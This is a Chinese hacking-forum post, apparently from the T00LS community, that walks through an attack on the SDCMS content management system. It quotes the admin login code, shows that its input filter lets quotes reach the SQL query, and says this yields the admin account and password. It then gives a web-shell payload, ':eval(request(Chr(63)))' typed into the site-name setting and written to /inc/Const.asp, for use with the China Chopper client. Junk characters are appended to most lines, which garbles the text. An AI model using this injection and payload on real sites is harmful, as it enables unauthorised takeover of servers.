作者:T00LS 鬼哥: g2 a" L+ T2 E. A* S
漏洞文件:后台目录/index.asp% K7 v9 h8 Q C8 t- `
) C" k! B6 G+ r% C- R6 `Sub Check$ E/ F6 |* v; l, T9 ? }' R" N* A% k
Dim username,password,code,getcode,Rs
1 M, R. s) K& l' q$ x, l) R IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub8 A9 |& H1 V B7 Y, \
username=FilterText(Trim(Request.Form("username")),1)' P) M, L8 B Q& X
password=FilterText(Trim(Request.Form("password")),1); `3 G! q; B' T6 Y! [
code=Trim(Request.Form("yzm")), a$ o6 E2 ?9 t3 x" K) Q R) c
getcode=Session("SDCMSCode"); Q5 w' o/ ?/ q! R/ n& d
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died% C, t3 C, P' g7 W# I& a
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied' Z5 O. }7 C9 M# O# d C- L
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied3 j) X3 A U/ Z; ?
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied, O9 k: C, G; x9 w& ^
IF username="" or password="" Then/ F3 T+ X% j5 G( W( ^) s
Echo "用户名或密码不能为空" ied
, {- J# j: x; e, ?/ t( Y Else
! g0 g* q0 @$ ~+ R# H9 u2 N. A8 j Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
7 L1 w X' n+ g, Y IF Rs.Eof Then6 t- {' X4 s w
AddLog username,GetIp,"登录失败",1! ?4 n% j! n1 m: F' I
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"3 L0 T4 R5 H( O& M F3 \
Else
+ Z5 Q$ D6 t" ?% F9 ^ Add_Cookies "sdcms_id",Rs(0)
+ n* P+ M- j9 c I4 U Add_Cookies "sdcms_name",username0 [ l# n. ^$ Y& w. {
Add_Cookies "sdcms_pwd",Rs(2)2 v( n( `6 Q1 i2 u( H
Add_Cookies "sdcms_admin",Rs(3)
, |7 _. Y0 c: `2 R Add_Cookies "sdcms_alllever",Rs(4)
2 e8 u3 v) @+ \' o+ _/ {" `- J Add_Cookies "sdcms_infolever",Rs(5)* E1 K6 O V; y% a
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")6 W: L. j. C7 r
AddLog username,GetIp,"登录成功",1
: ]. M4 _( @# n# U- W2 t: K6 s '自动删除30天前的Log记录
+ t& y+ o: P$ m7 s. q3 H1 U IF Sdcms_DataType Then$ ^1 n+ W8 p9 }( S8 Q
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
7 H7 X* j8 e) A& y( T1 L: J" E Else1 i* U: m ~2 ]. u ?
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")/ m/ f+ q" ?9 D' W4 v" g+ G
End IF; N- Y# S! M: g3 i6 E+ m
Go("sdcms_index.asp")
! A6 @( l; s8 F2 ^5 H End IF
% y e+ T+ i8 l" \: t; p Rs.Close$ c0 d: `/ O4 y
Set Rs=Nothing% T' ^9 [& i9 ]- ^' I4 n
End IF
5 }, `$ p0 m/ j+ s4 E# F1 MEnd Sub" }# h d# i; }' c8 |8 D
6 }* z4 c: Z. v
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
% ~8 C$ u8 v0 b' J* `1 y/ U
3 B( S) R, y0 P& |) v0 q& l( ?0 M! w/ qFunction FilterText(ByVal t0,ByVal t1), f+ N4 ?0 T* F: q2 Y \
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function& x4 r" s6 r( U1 _6 h) Y
t0=Trim(t0)
" j/ y g3 l. m C5 L6 i3 \, V Select Case t1( I. e2 |: M7 ?( D5 J; J: }
Case "1"
' L/ ^6 r& _4 G: ?! B t0=Replace(t0,Chr(32),""): H" [, C. O7 q, P7 _
t0=Replace(t0,Chr(13),"")
2 W1 s4 S! T k I, d t0=Replace(t0,Chr(10)&Chr(10),"")
8 R. P6 h2 H! |2 b" ? t0=Replace(t0,Chr(10),"")) t2 V0 l/ Y/ N8 S& P
Case "2"6 Q, q" M# q9 w7 C4 @6 I" P8 d9 J
t0=Replace(t0,Chr(8),"")'回格/ N( B, M B, W
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
! u1 l* m9 W$ G7 G! R t0=Replace(t0,Chr(10),"")'换行
; _! [; C4 P# P: n) I t0=Replace(t0,Chr(11),"")'tab(垂直制表符). M0 ~: T5 H" I& F$ d
t0=Replace(t0,Chr(12),"")'换页; j; L1 t, y& K- y
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合0 L8 T# D3 Z7 {/ v1 \! i- f
t0=Replace(t0,Chr(22),"")% j* N4 P# T2 u6 V/ W2 }+ z z- O
t0=Replace(t0,Chr(32),"")'空格 SPACE
- k3 i! N6 E9 X1 q, ` t0=Replace(t0,Chr(33),"")'!
8 [6 D* H+ F5 [5 F2 \ t0=Replace(t0,Chr(34),"")'"- |- c- o2 O4 K6 W
t0=Replace(t0,Chr(35),"")'#
/ u. N& y3 K/ Q. C% U t0=Replace(t0,Chr(36),"")'$, e' \ G2 _7 Q9 V& F
t0=Replace(t0,Chr(37),"")'%% L$ o5 u* q. M" m7 @3 v
t0=Replace(t0,Chr(38),"")'&: m/ q4 B" y' H$ z
t0=Replace(t0,Chr(39),"")''
! S( T5 o& ], e; Z! h7 d8 T2 ~; u/ Y t0=Replace(t0,Chr(40),"")'(1 w; f* e% c0 A n8 y
t0=Replace(t0,Chr(41),"")')* m( R9 @+ F9 c1 @# P% b2 K
t0=Replace(t0,Chr(42),"")'*) x" p, E4 S% k- n; E3 |
t0=Replace(t0,Chr(43),"")'+
~$ ~9 x% @! j5 o t0=Replace(t0,Chr(44),"")',2 Z3 i- e! J8 ~* e% Q1 Q
t0=Replace(t0,Chr(45),"")'-1 X0 \! K& v n# C4 Z
t0=Replace(t0,Chr(46),"")'.9 X) n0 t4 R% [" r+ b3 g# P+ L
t0=Replace(t0,Chr(47),"")'/
`6 P# q, X& y) h* I- s0 o; s% G0 ] t0=Replace(t0,Chr(58),"")':
3 c, o7 L, _8 U6 c) [ t0=Replace(t0,Chr(59),"")';
8 r- }3 \$ Y- s: B t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>% @4 d) x; b% S8 X7 d7 v
t0=Replace(t0,Chr(63),"")'?7 M n p. O' P/ s. c" G, i1 @$ n
t0=Replace(t0,Chr(64),"")'@
5 r2 Q' l) X! V& o, D6 e t0=Replace(t0,Chr(91),"")'\ x& f, p; b/ s$ @5 Q9 k" m% d$ t
t0=Replace(t0,Chr(92),"")'\) W+ W4 a" l( m/ O- [
t0=Replace(t0,Chr(93),"")']; G3 s7 r" J1 l7 l
t0=Replace(t0,Chr(94),"")'^% w3 e; ?0 J& o1 l# M v" l* N
t0=Replace(t0,Chr(95),"")'_
0 F: C7 D4 C6 T1 |' d* W t0=Replace(t0,Chr(96),"")'`# q) ^( U. L" z1 J, s) d9 `
t0=Replace(t0,Chr(123),"")'{
r' V' Y0 p! { t0=Replace(t0,Chr(124),"")'|
* J4 w2 E1 K2 [9 K& ?$ w t0=Replace(t0,Chr(125),"")'}# N3 T u3 E9 p$ {
t0=Replace(t0,Chr(126),"")'~
9 a. |( W! X: ?- _ Case Else' C g$ T; X! C; _. k
t0=Replace(t0, "&", "&")9 m O4 n. F; D0 g
t0=Replace(t0, "'", "'")
$ ] n) Z0 E) Z3 ] t0=Replace(t0, """", """)9 V2 c% p" F5 g I( o
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">"). M9 Z! n' Z9 t8 |* Q
End Select# I; o& r0 n' n. M! A a: C
IF Instr(Lcase(t0),"expression")>0 Then
. X; c+ J8 D- E6 o8 s! | t0=Replace(t0,"expression","e­xpression", 1, -1, 0): R \, ~3 P! S2 p% [
End If7 d: C% [: Z9 B' {
FilterText=t0, c, F% \7 o# N
End Function
1 C* Q' h" |: l7 o1 D# A7 K( e: Y% k
看到没。直接参数是1 只过滤
8 a+ Y- k" |- v" k0 q t0=Replace(t0,Chr(32)," ")
6 [) Y/ D2 P1 ~: W' U t0=Replace(t0,Chr(13),"")8 E0 |3 z* @5 M
t0=Replace(t0,Chr(10)&Chr(10),". P; r/ h- N" @; S
")
0 r0 a* z" L& D8 f9 A/ `' g" v t0=Replace(t0,Chr(10),"
' J! p; d) ~% E/ F")/ T; O: p# Y- E; ~8 \- Q& Z( Z, ?3 I
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
+ C1 X+ m5 s5 K) rEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP# S; b1 u& V8 ^- Q
+ y4 e' e. g ]
测试:
8 X) m9 c$ X2 Z( H% m9 a( X/ f9 Z; e( u, l+ D
/ T* ]' b2 z, I) @- T; k现在输入工具上验证码,然后点OK' ]" L+ y$ {% D
% _4 r8 [7 c; o% I2 N* N
5 d5 c3 [ H5 d$ O看到我们直接进入后台管理界面了,呵呵!9 }/ e t" a1 _: v* V, p
- G2 n3 e6 G& t/ O( e* T: r3 D: Y4 n- n$ T+ w3 |
. W+ F/ K s* \% F这样直接进入后台了。。。。) w' P! E9 f- o: q# o7 ?
! ^$ h) R+ Y( N$ i1 I b
' O5 [" G+ b- ^8 o4 j) O
7 `# i# ^6 x4 KSDCMS提权:3 Q# f& u! o+ N; d* S) ?
' a( Y" U2 f. J' W( L
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?$ t- J) o8 L& }
5 K. ?& A% _0 j9 s5 S4 D7 ?) {0 j0 G
+ t% M8 _( H8 G6 ~- l2 c( LOK,现在用菜刀连接下!
/ l+ u0 S6 ]* p6 ~' e: O( A; R! L# h* i. V3 i5 E3 m6 E
1 m) f" J* d# ]! h; t9 W9 @9 C
6 Z( t+ J" {7 z0 r# } 7 \8 a- G& |- l& b* `& E
) T$ X" c5 @4 X9 F0 \- y9 g, l. a4 k |